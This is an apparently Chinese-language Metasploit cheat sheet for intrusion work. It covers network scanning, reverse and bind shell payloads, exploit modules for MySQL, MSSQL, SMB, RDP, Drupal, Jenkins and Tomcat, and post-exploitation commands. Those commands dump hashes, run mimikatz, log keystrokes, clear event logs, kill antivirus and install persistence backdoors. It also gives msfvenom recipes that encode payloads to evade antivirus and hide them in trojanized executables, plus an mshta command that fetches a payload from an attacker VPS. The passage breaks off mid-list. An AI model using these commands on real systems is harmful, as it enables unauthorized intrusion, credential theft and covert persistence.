1.首先基于MSF的資産收集
網絡主機收集:
use auxiliary/scanner/discovery/udp_probe
use auxiliary/scanner/discovery/udp_sweep
use auxiliary/scanner/discovery/arp_sweep
use auxiliary/scanner/dns/dns_amp 基于DNS找存活主機,端口為53
use auxiliary/scanner/netbios/nbname 基于nbname找存活主機,端口為137
use auxiliary/scanner/http/title 端口為80
use auxiliary/scanner/portscan/ack
use auxiliary/scanner/portscan/tcp 指定網段探尋端口
use auxiliary/scanner/portscan/syn
use auxiliary/scanner/portscan/ftpbounce
use auxiliary/scanner/portscan/xmas
内網服務收集:
搜尋http服務:use auxiliary/scanner/http/http_version 端口80
搜尋smb服務:use auxiliary/scanner/smb/smb_version 端口445
搜尋ftp服務: use auxiliary/scanner/ftp/ftp_version 端口21
搜尋ssh服務: use auxiliary/scanner/ssh/ssh_version 端口22
搜尋talnet服務: use auxiliary/scanner/telnet/telnet_version 端口23
搜尋mysql服務: use auxiliary/scanner/mysql/mysql_version 端口3306
搜尋db2服務: use auxiliary/scanner/db2/db2_version 端口50000
搜尋rdp服務:use auxiliary/scanner/rdp/rdp_scanner 端口3389
搜尋smtp服務:use auxiliary/scanner/smtp/smtp_version 端口25
2.關于MSF攻擊的指令
1.首先關于msf常用的payload
windows:
windows/meterpreter/reverse_tcp
windows/meterpreter/bind_tcp
windows/meterpreter/reverse_hop_http
windows/meterpreter/reverse_http
windows/meterpreter/reverse_http_proxy_pstore
windows/meterpreter/reverse_https
windows/meterpreter/reverse_https_proxy
windows/shell_reverse_tcp
windows/shell_bind_tcp
windows/x64/meterpreter/reverse_tcp
windows/x64/meterpreter/bind_tcp
windows/x64/shell_reverse_tcp
windows/x64/shell_bind_tcp
linux:
linux/x86/meterpreter/reverse_tcp
linux/x86/meterpreter/bind_tcp
linux/x86/shell_bind_tcp
linux/x86/shell_reverse_tcp
linux/x64/shell/bind_tcp
linux/x64/shell/reverse_tcp
linux/x64/shell_bind_tcp
linux/x64/shell_bind_tcp_random_port
linux/x64/shell_reverse_tcp
2.關于mysql
use auxiliary/scanner/mysql/mysql_login 用于内網中的批量以及單主機的登入測試(可用作暴力破解)。
use exploit/multi/mysql/mysql_udf_payload 用于root啟動的mysql 并root的udf提權.
需設定payload: set payload windows/meterpreter/bind_tcp
use exploit/windows/mysql/mysql_mof 提權,與udf類似
use auxiliary/scanner/mssql/mssql_ping 這個也可以用來掃描mssql服務。
use exploit/windows/mysql/scrutinizer_upload_exec 上傳檔案執行。
use auxiliary/admin/mysql/mysql_sql 執行sql語句
3.關于sqlserver
use auxiliary/admin/mssql/mssql_enum 可以看見非常詳細的sqlserver資訊
use auxiliary/admin/mssql/mssql_enum_sql_logins 枚舉sql logins,速度較慢
use auxiliary/admin/mssql/mssql_escalate_dbowner 發現dbowner,當sa無法得知密碼的時候,或者需要其他賬号提供來支撐下一步的内網滲透 ??????
use auxiliary/admin/mssql/mssql_exec 當沒有激活xp_cmdshell,自動激活。并且調用執行cmd指令 權限繼承 Sql server。
用法:
set CMD cmd.exe /c whoami即可 然後exploit/run
use auxiliary/admin/mssql/mssql_sql 如果熟悉Sql server 資料庫特性,以及sql語句,使用該子產品
use auxiliary/admin/mssql/mssql_sql_file 當需要執行多條sql語句的時候,或者非常複雜。msf本身支援執行sql檔案。授權滲透應用 較少,非授權應用較多的子產品。
use use auxiliary/scanner/mssql/mssql_login 批量發現内網mssql主機
use exploit/windows/mssql/mssql_payload 非常好的子產品之一,在實戰中。針對不同時間版本的系統都有着自己獨特的方式來上傳 payload。
use exploit/windows/misc/hta_server //使用hta提權到msf上 然後在目标機器上執行mshta.exe http://VPS_IP:8080/IAKWSlu.hta
3.關于FTP
use auxiliary/scanner/ftp/ftp_login 于内網中的批量以及單主機的登入測試。
use auxiliary/scanner/ftp/anonymous 發現存活的ftp主機,是否存在匿名登入
ps:在該子產品下,可以使用nmap來輔佐, db_nmap -sS -T4 -p21 192.168.1.0/24
use auxiliary/fuzzers/ftp/ftp_pre_post ftp本地模糊測試輔助子產品
4.關于smb
use exploit/windows/smb/smb_login //爆破smb
use exploit/windows/smb/smb_scanner //爆破smb
use exploit/windows/smb/psexec_psh 跟psexec差不多,抓hash
use auxiliary/admin/smb/psexec_ntdsgrab //抓取ntds.dit和sysyem, hiv檔案
use exploit/windows/smb/smb_relay //smb中繼攻擊,實質是ms08_068,監聽端口,在域内執行ipc時會被抓hash
use auxiliary/server/capture/smb //抓取hash
5.關于RDP
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce //cve 0708
use exploit/multi/vnc/vnc_keyboard_exec //關于vnc的
6.其他
1.use exploit/multi/handler //msf監聽子產品
exploit/multi/script/web_delivery //基于Powershell的
2.use exploit/windows/smb/psexec //利用msf啟動psexec
3.use exploit/windows/smb/psexec_psh //pass hash
4.use exploit/windows/local/ms15_051_client_copy_image //利用ms15_051
5.use exploit/windows/local/bypassuac //繞過uac,一般繞不過去
6.use post/windows/gather/hashdump //抓hash
7.use post/windows/gather/smart_hashdump //導出hash,須有system權限
8.use exploit/windows/local/always_install_elevated //提權
9.use exploit/windows/fileformat/office_word_hta //利用.rtf檔案生成可執行的.hta腳本來托管
10.use exploit/multi/samba/usermap_script //samba的exp
11.use exploit/unix/irc/unreal_ircd_3281_backdoor //IRC服務,端口6697的EXP
12.use exploit/multi/http/playsms_uploadcsv_exec //playsms的RCE的EXP
13.use expliot/unix/webapp/drupal_drupalgeddon2 //drupal的exp
14.use auxiliary/scanner/redis/file_upload normal Redis File Upload
15.use auxiliary/scanner/redis/redis_login normal Redis Login Utility
16.use auxiliary/scanner/redis/redis_server normal Redis Command Execute Scanner
17.use exploit/multi/http/jenkins_script_console //jenkins的exp
18.use auxiliary/scanner/nfs/nfsmount //關于2049 nfs的
19.use exploit/windows/iis/iis_webdav_scstoragepathfromurl //iis的exp
20.use exploit/multi/script/web_delivery //關于轉化shell的,假如用koadic打下來的,可以轉到msf
21.use exploit/multi/http/moodle_cmd_exec //moodle的exp
22.use post/multi/recon/local_exploit_suggester //對比打了哪些更新檔,能否提權
23.use exploit/multi/browser/firefox_proto_crmfrequest //關于浏覽器攻擊拿shell的
24.use exploit/multi/http/tomcat_mgr_deploy //登入tomcat後布置war包拿shell
25.use exploit/multi/http/lcms_php_exec //lotuscms的exp
26.use auxiliary/admin/http/joomla_registration_privesc //關于joomla的掃描
27.use exploit/multi/misc/java_jmx_server //關于jmx的反序列化
3.關于MSF的端口轉發:
1.基于portfwd的端口轉發
這個需要跳到meterpreter,首先use exploit/multi/handler
然後在set PAYLOAD windows/meterpreter/reverse_tcp
若靶機的ip為192.168.1.119 需要轉發的端口為80,3389。
我們可以session -i檢視反彈回來的機器,session -i 具體數字選擇進入相應的互動模式
portfwd add ‐l 33389 ‐r 192.168.1.119 ‐p 3389
portfwd add ‐l 30080 ‐r 192.168.1.119 ‐p 80
4.關于meterpreter的使用技巧.
1.clearev //清除日志
2.getsystem //提權
3.keyscan_start && keyscan_dump //記錄鍵盤
4.migrate -p 2108 //遷移程序,如果失敗,可嘗試load stdapi
5.screenhot //截屏
6.download c:\\users\\1.txt /home/Desktop //下載下傳,後面是自己的位置
7.upload /home/Desktop/1.php c:\\users\\desktop//上傳,後面是靶機的位置。
8.execute -f notepad.exe //執行指令
9.shell //傳回互動式指令行界面
10.load incognito //加載incognito
11.load powershell&&powershell_shell //加載powershell插件&&以Powershell的格式來提示而不是cmd的形式。
12.exploit/windows/local/registry_persistence
exploit/windows/local/vss_persistence
exploit/windows/local/s4u_persistence //利用給系統資料庫加載shellcode,然後再用ps加載,運作meterpreter
13.load mimikatz //加載mimikatz
meterpreter > load mimikatz #加載mimikatz
meterpreter > msv #擷取hash值
meterpreter > kerberos #擷取明文
meterpreter >ssp #擷取明文資訊
meterpreter > wdigest #擷取系統賬戶資訊
meterpreter >mimikatz_command -f a:: #必須要以錯誤的子產品來讓正确的子產品顯示
meterpreter >mimikatz_command -f hash:: #擷取目标 hash
meterpreter > mimikatz_command -f samdump::hashes
meterpreter > mimikatz_command -f sekurlsa::searchPasswords
14.run post/windows/gather/checkvm //檢視是否是虛拟機
run post/windows/gather/smart_hashdump //檢視hash
run post/windows/gather/enum_ie //檢視浏覽器的cookie,通路記錄
run killav //關殺軟程序
run vnc //檢測對方桌面
run persistence -U -i 30 -p 2333 攻擊機ip //維持權限 U使用者登入時啟動後門,X是系統啟動時。 i是shell互動的時間
15.load powershell
powershell_import /root/Copy-VSS.ps1 powershell_execute Copy-VSS Copy-VSS -DestinationDir C:\
5.關于MSF的免殺
1.首先說說關于修改檔案的屬性
修改檔案屬性就是修改檔案的MACE值,可以幫助掩蓋檔案在系統上的活動。
1.首先使用Timestomp修改檔案屬性
timesomp 1.txt -v :檢視檔案的屬性
timesomp 1.txt -b :清空檔案所有屬性
timesomp 1.txt ./ -r : 歸地清空目前目錄中的所有檔案
timesomp 1.txt -m :修改檔案屬性
2.關于用msfvenom繞殺軟:
(1)嘗試使用不同的編碼器對stage進行編碼,可能繞過部分殺軟的清除(mutil/handler裡頭)
msfvenom -p windows/meterpreter/reverse_https
使用reverse_https等payload可以換成anti symantec,然後在mutil/handle設定
1.set EnableStageEncoding true
2.set stageencoder x86/fnstenv_mov
3.set stageencodingfallback false
(2)在msfvenom裡面加上-e x86/shikata_ga_nai -i 5 加上這2個參數
(3)在msfvenom裡面加上-x notepad.exe
(4)msfvenom -p windows/meterpreter/reverse_tcp_rc4 lhost=10.211.55.2 lport=3333 RC4PASSWORD=xinxin -f c
(5)msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 LHOST=10.211.55.2 LPORT=3333 -f raw | msfvenom -e x86/alpha_upper -i 10 -f raw | msfvenom -e x86/countdown -i 10 -x putty.exe -f exe -o payload5.exe //多次編碼
(6)先去下載下傳一個壓縮軟體 wget xxxxx/xxx/xxx/xx.zip 然後用unzip解壓
msfvenom -p windows/shell_reverse_tcp LHOST=(ip) LPORT=8080-e x86/shikata_ga_nai -x Desktop/procexp.exe -i 5 -f exe -o /Desktop/backdoor.exe 以解壓的exe做為模闆
set paylaod windows/shell/reverse_tcp
6.關于msfvenom指令
1.msfvenom -f msi -p windows/exec CMD=calc.exe>test.msi //制作生成包
2.msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.1 lport=4444 -f psh-reflection -o xinxin.ps1 //生成ps的paylaod
3.-e cmd/powershell_base64 //在cmd中運作,彈回powershell
4.msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.1 LPORT=4444 -f raw -o x86_shell.war //部署java的war包
5. https://xz.aliyun.com/t/2381
6.4
7.MSF能加載的其他軟體
1.sqlmap load sqlmap
2.incognito load incognito
3.nmap load nmap
8.關于MSF的後滲透
1.msf exploit(multi/handler) > set ExitOnSession false //經常會遇到假session或者剛連接配接就斷開的情況,經常會遇到假session或者剛連接配接就斷開的情況
2.set SessionCommunicationTimeout 0 //預設情況下,如果一個會話将在5分鐘(300秒)沒有任何活動,那麼它會被殺死,為防止此情況可将此項修改為0
3.set SessionExpirationTimeout 0 //預設情況下,一個星期(604800秒)後,會話将被強制關閉,修改為0可永久不會被關閉
4.msf exploit(multi/handler) > exploit -j -z //在背景持續監聽,-j是背景任務,-z是持續監聽 jobs -k是全部結束。handler -H 10.211.55.2 -P 3333 -p windows/meterpreter/reverse_tcp 也可以這樣
5.